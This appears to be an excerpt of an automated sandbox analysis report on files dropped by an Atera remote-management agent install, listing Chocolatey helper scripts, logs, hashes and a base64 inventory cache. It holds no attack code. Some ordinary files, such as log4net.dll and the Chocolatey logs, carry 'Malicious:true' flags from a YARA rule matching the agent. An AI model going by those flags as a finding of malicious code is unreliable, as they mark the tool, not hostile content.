                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Start-ChocolateyProcessAsAdmin {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Runs a process with administrative privileges. If `-ExeToRun` is not..specified, it is r

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Test-ProcessAdminRights.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1913
                                                                                                                                                                                                                                        Entropy (8bit):5.085202352125102
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMwr86KhPWBT2TiCWezzwYYm6tFnzXHtQ:cSyL+4pGXHFKo2PD2CWbm6nnzXq
                                                                                                                                                                                                                                        MD5:12DE733D7CE18AF405D81469211573D3
                                                                                                                                                                                                                                        SHA1:89C23822D6717F00281EC45FB24F420678B9901B
                                                                                                                                                                                                                                        SHA-256:F07208BE10E70B4774168EC7C0CC86FC594F1D37D991E766EC46EE335302B083
                                                                                                                                                                                                                                        SHA-512:38775567CC21292C3E06E6F7A44BC7A3C525CC2A49A95E114CFB0C4BFF2AF7EDAEFB4D09A3FD777482BCB0088507323B5618128B96A4716BE9655010A390453F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Test-ProcessAdminRights {..<#...SYNOPSIS..Tests whether the current process is running with administrative rights......DESCRIPTION..This function checks whether the current process h

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\UnInstall-ChocolateyZipPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2897
                                                                                                                                                                                                                                        Entropy (8bit):5.162176606162476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMjgAOTJEd4phQ44Yb1eVGXsjlKo9obKB9x/kgeoS5:cSyL+4pGXHFKod+aSZVLjo7m1Ju5
                                                                                                                                                                                                                                        MD5:B0DDD1F261098CAF4092E78539A61796
                                                                                                                                                                                                                                        SHA1:6F753444CE488773EC7AD4942BFB79BF79BC2A65
                                                                                                                                                                                                                                        SHA-256:12E80EA9AA3D894DB1BB1999DD766EF4925ECD59FEC8DEDCABF241DE96E1A949
                                                                                                                                                                                                                                        SHA-512:5C624D18321916C905287595ECC72CF996F24F27E68E22F35C1D07AD7004F579EE64D3E0AE5AE6867DE13A02E61F9893D3DB848A82D41FEC309C77DD88752F75
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyZipPackage {..<#...SYNOPSIS..Uninstalls a previous installed zip package, may not be necessary......DESCRIPTION..This will uninstall a zip file if installed via I

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-BinFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3683
                                                                                                                                                                                                                                        Entropy (8bit):5.175198661740516
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKo2fFecAVuAlxoVGv5nPcdTmqKYDqnShM:cSyL+QGXHc0nVuAlOVGvpPcdTmx
                                                                                                                                                                                                                                        MD5:FCD698961855179908D84E45C1699CD3
                                                                                                                                                                                                                                        SHA1:449CF377EA5EEFC250DF24DC64F36F374C3EA022
                                                                                                                                                                                                                                        SHA-256:093191162E950B4CFDCDD066865C74E47F3F05B3543A9A98A7B82AD98C8236CA
                                                                                                                                                                                                                                        SHA-512:96C0B5867C19A9F06C81F507102FDBCC270BEBAB132E8A3EDE88CED129E369D282AC5F874B0F0AB94214C41C857EF74735909045AA3FDACFF96C74A38FA7AFB6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-BinFile {..<#...SYNOPSIS..Removes a shim (or batch redirect) for a file......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\bin`..included in t

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3131
                                                                                                                                                                                                                                        Entropy (8bit):5.1027007896112115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyX54q90AlH31KoMSta1Qr44qR4MXbVqlzmwETvp6SCodQsV:cSyp4aXHFKovRVKVwETB6SCu
                                                                                                                                                                                                                                        MD5:256F7D3F77746A9167E513497A1DEF85
                                                                                                                                                                                                                                        SHA1:0F213C21586F176C405C1877C6E7D2FD5B8E85AC
                                                                                                                                                                                                                                        SHA-256:4CE0A48B7A6D6FE997324F7F916DEA532754E4C371CEE38CACE5134EA1D3A101
                                                                                                                                                                                                                                        SHA-512:763263F5E68A1CB7391394570A7CCDDAF518A1522E3F0435EA62848631A03CF278E15F6375F02C0466CBEEBB4365BA419ADB3AB6549BA3BCB09C9BB718825F03
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Removes a persistent environment variable......DESCRIPTION..Uninstall-ChocolateyEnvironmentVariable removes an environment variable..with the specified name and value. The variable c

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-ChocolateyPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6062
                                                                                                                                                                                                                                        Entropy (8bit):5.047713257621158
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoQ79vUU2ZTooaYjuVSQPsVeqYQfiyLi9xSQeSDHyXfOWQfpQf6:cSyL+QGXHweZdlFV8bQ7ov
                                                                                                                                                                                                                                        MD5:39599553B392FDEA36398A474FD623F2
                                                                                                                                                                                                                                        SHA1:89587AEDEC8ECADD274EE80EE43101032A55BAD4
                                                                                                                                                                                                                                        SHA-256:716E51F45EA009C6AEC10F123C58A837516E59910CD0DFB274DF0FF6A56EBF08
                                                                                                                                                                                                                                        SHA-512:1BA55A2CEC0EA911B3418FA8B1979EE8EF45C16033C82F1794416CA85D8F7D9B2618855008F8014BD1FA2A8466ECEB9E36A41E985122F8D04C765051C6DAF5C0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyPackage {..<#...SYNOPSIS..Uninstalls software from "Programs and Features"......DESCRIPTION..This will uninstall software from your machine (in Programs and..Feat

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Update-SessionEnvironment.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3611
                                                                                                                                                                                                                                        Entropy (8bit):5.0574071891740795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKosxHb1u5jen+UMGeKJ1qeg:cSyL+QGXHWp+i5MzK/g
                                                                                                                                                                                                                                        MD5:AB7F32D92867D5CC52CB177374C656C2
                                                                                                                                                                                                                                        SHA1:ACB20AAADD71C921899DE91640DA2AB5F78984CA
                                                                                                                                                                                                                                        SHA-256:A1AD9ED3C049CA14C7970AA17CF5C6A28448E70FF2BE4E438A61C6DAB68E82B7
                                                                                                                                                                                                                                        SHA-512:22295E4C289EC0057B3F13A3B9C18B9B02CC4379D8E1F4F6FEBE48A45A05D92A5384EC158E4370CB5E67F33751377C2CD81C4F8E555145C49BF7680FE545F905
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Update-SessionEnvironment {..<#...SYNOPSIS..Updates the environment variables of the current powershell session with..any environment variable changes that may have occured during a.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Write-FunctionCallLogMessage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1974
                                                                                                                                                                                                                                        Entropy (8bit):5.219633769893594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpXAAyU0E+SlHQk1GpsLA9i9yVMppqTDf3nQytTxGEN8X/+nKB0chWqc:cSyX54q90AlH31KoMYpqfvVF2M1zrvn
                                                                                                                                                                                                                                        MD5:6A2F945A16F003443B3C14907163C357
                                                                                                                                                                                                                                        SHA1:EBDDA9AC96E6F71D0BEED493C5074F2CAFE638C2
                                                                                                                                                                                                                                        SHA-256:279171398D6F65221D4636DA730AB2F07C6DD56321BF76A03D0CA7D3D7B0B574
                                                                                                                                                                                                                                        SHA-512:C09FC9C169D5197B841EED9D44135F43AA8D11CC0463A567E922FE019545C9036542AD40AF5D64B808AF92E143787A8231CBF4F5B8A2F8F94E48614E8E06EFA0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Write-FunctionCallLogMessage {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Writes function call as a debug message......NOTES..Available in 0.10.2+.....This function is not part of the API......INPUTS..None.....OUTPUTS..None.....PARAMETER Invocation..The invocation of the function (`$My

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lastSnapshot.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                                        Entropy (8bit):3.6792292966721747
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:6rIrGlwYLVUP:/rMLVUP
                                                                                                                                                                                                                                        MD5:AA8819BA9E5AA3EA6451342287FD062A
                                                                                                                                                                                                                                        SHA1:DE2F3649ABE435CB36DB125C8B9676C2006D47CE
                                                                                                                                                                                                                                        SHA-256:E76060485F0419FF7C5FF18CC37157F6AF6014FC8D8AED7B486A3B51A410FCEE
                                                                                                                                                                                                                                        SHA-512:3776A25B4DF18ED2D07C4C4254D436AD73B9261D055EDD10976F8CA4AFF9B2454E6E5356288B1E6F94A572574C2FA1E57E7D354E718E5940C99744D56AF48350
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:fc7a5ab8c8a580d3eef4fe04c8c901f6

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):280624
                                                                                                                                                                                                                                        Entropy (8bit):5.691550591631762
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:tG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCb:tJrycoB3HVeESME3pnaVTS1nh7hCai
                                                                                                                                                                                                                                        MD5:39757BEFD8F82DB569267A45A83C6AA5
                                                                                                                                                                                                                                        SHA1:6F02630FBBE19E9594547B2FA3C5AD1E065AA86B
                                                                                                                                                                                                                                        SHA-256:F72C68CBAC83753453AD41340CB7E191CB9897E0E99EB3274D9C6EFAE6EBD6C7
                                                                                                                                                                                                                                        SHA-512:BC451FD46997B558AEBFB1E793D9ED5E076089FA9BF7EEA15B13472179165DC7211D5554C69D78B4011168A766943E7FB4470BE50EC6990239F70DF20E3577C9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p3..........." ..0...... ........... ... ....... .......................`...... .....`.................................h...O.... ............... ..0(...@......L................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1018
                                                                                                                                                                                                                                        Entropy (8bit):5.296054348194499
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:kfRVR897gfr/Vf9fVR897gfGdfIVR897gfXdo+fo68fVNVifFoZFe:WRn8ha5Zn8haGdIn8ha35OVNV8FkM
                                                                                                                                                                                                                                        MD5:088558E49B8E515E8658DB653AEA725F
                                                                                                                                                                                                                                        SHA1:1D6C02B58F0DA554419EC287C9A6A39D69EF4189
                                                                                                                                                                                                                                        SHA-256:766BCC7FB3FB7FD0E633F53E8D7732D3943195B3653BE6B9B98B7A3C36E9E5D4
                                                                                                                                                                                                                                        SHA-512:9536D58EE6A4C156D05869ACB5519CD1FF4618A12821106244B0F3CD23F0960E86FA9A779A948C03E502C657119C0FF71EAA2D97C425511D1CF0FDB8DB241518
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:34,728 8132 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-10-02 11:20:35,212 8132 [WARN ] - Enabled allowGlobalConfirmation..2024-10-02 11:20:35,321 8132 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-10-02 11:20:35,931 8132 [WARN ] - 0 packages installed...2024-10-02 11:20:36,165 8132 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-10-02 11:20:36,962 8132 [INFO ] - Outdated Packages.. Output is package name | current version | available version | pinned?....2024-10-02 11:20:37,368 8132 [WARN ] - ..Chocolatey has determined 0 package(s) are outdated. ..2024-10-02 11:20:37,384 8132 [WARN ] - ..Enjoy using Chocolatey? Explore more amazing features to take your..experience to the next level at.. https://chocol

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19791
                                                                                                                                                                                                                                        Entropy (8bit):5.4121867192338025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i3C5CzzhdItHcAQl3C5CzzhdftH4Aa1C5CzzydftH4ASL:i3C5Czzxl3C5CzzO1C5Czzh
                                                                                                                                                                                                                                        MD5:0C4DF41C95531263D702DEA37CE948D5
                                                                                                                                                                                                                                        SHA1:BEEC2E9A235D85E6E796AEA16C8E0A421FD358C2
                                                                                                                                                                                                                                        SHA-256:64AC7CE571CB804424E6F11C256643775161F12B9CB5717D6EAC4768EA13B791
                                                                                                                                                                                                                                        SHA-512:F6C330490532836693380D11A079A46C5E6B102768A08F8A8FDB44ACE4D0B4E8A5CBAD697C623156093343E0FB80F1669699E560A0AC8F5D26EFE72023E89832
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:28,759 8132 [DEBUG] - XmlConfiguration is now operational..2024-10-02 11:20:28,962 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers"...2024-10-02 11:20:29,165 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions"...2024-10-02 11:20:30,712 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects"...2024-10-02 11:20:30,759 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools"...2024-10-02 11:20:31,743 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config"...2024-10-02 11:20:34,165 8132 [DEBUG] - Attempting to create direc

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\pcach.cch

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3788), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3788
                                                                                                                                                                                                                                        Entropy (8bit):5.5930524808142525
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:23atiy3IU5ghNMDulMHMdl/HM7l/H0trAI8e6hmri:23atiy3F5gHkulMHsdH+dH0FAe6hmri
                                                                                                                                                                                                                                        MD5:5ED162248B5F6B18ABE1583A440153A9
                                                                                                                                                                                                                                        SHA1:8780E4091DB000D692742E0BBF15D5CC60053333
                                                                                                                                                                                                                                        SHA-256:191FB1991A205F0BFFBF0113BBED953B712DFAE31D072A24BD85466765DF10EE
                                                                                                                                                                                                                                        SHA-512:94AB69A8C6424D4815AD04FC87D3EEAEC2BBE1494CD86FD0BBFB6E3856B1C28EEC2B85AE59E989825F4EDFDF848224869F948B50F100E02D7D2BEABD177191A9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:eyJJbnN0YWxsZWRBcHBzIjpbeyJSZW1vdmVhYmxlIjp0cnVlLCJOYW1lIjoiNy1aaXAgICh4NjQpIiwiVmVyc2lvbiI6IjIzLjAxIiwiSW5zdGFsbGVkT24iOiIyMDIzLTEwLTAzVDA2OjUxOjI4LjQ1NTM0NzMtMDQ6MDAiLCJQdWJsaXNoZXIiOiJJZ29yIFBhdmxvdiIsIlNpemVJbkJ5dGVzIjo1Nzg5Njk2LCJBdmFpbGFibGVWZXJzaW9uIjpudWxsLCJTdGF0dXMiOiJJbnN0YWxsZWQiLCJUaGlyZFBhcnR5TmFtZSI6bnVsbH0seyJSZW1vdmVhYmxlIjp0cnVlLCJOYW1lIjoiQWRvYmUgQWNyb2JhdCAoNjQtYml0KSIsIlZlcnNpb24iOiIyMy4wMDYuMjAzMjAiLCJJbnN0YWxsZWRPbiI6IjIwMjMtMTAtMDNUMDA6MDA6MDAiLCJQdWJsaXNoZXIiOiJBZG9iZSIsIlNpemVJbkJ5dGVzIjo2MjY3NDUzNDQsIkF2YWlsYWJsZVZlcnNpb24iOm51bGwsIlN0YXR1cyI6Ikluc3RhbGxlZCIsIlRoaXJkUGFydHlOYW1lIjpudWxsfSx7IlJlbW92ZWFibGUiOmZhbHNlLCJOYW1lIjoiQXRlcmFBZ2VudCIsIlZlcnNpb24iOiIxLjguNy4yIiwiSW5zdGFsbGVkT24iOiIyMDI0LTAyLTI4VDA5OjUyOjA0LTA1OjAwIiwiUHVibGlzaGVyIjoiQXRlcmEgbmV0d29ya3MiLCJTaXplSW5CeXRlcyI6NDkyMDA0OCwiQXZhaWxhYmxlVmVyc2lvbiI6bnVsbCwiU3RhdHVzIjoiSW5zdGFsbGVkIiwiVGhpcmRQYXJ0eU5hbWUiOm51bGx9LHsiUmVtb3ZlYWJsZSI6ZmFsc2UsIk5hbWUiOiJHb29nbGUgQ2hyb21lIiwiVmVyc2lvbiI6IjExNy4wLjU5

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\RefreshEnv.cmd

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2340
                                                                                                                                                                                                                                        Entropy (8bit):5.120693108028518
                                                                                                                                                                                                                                        Encrypted:false
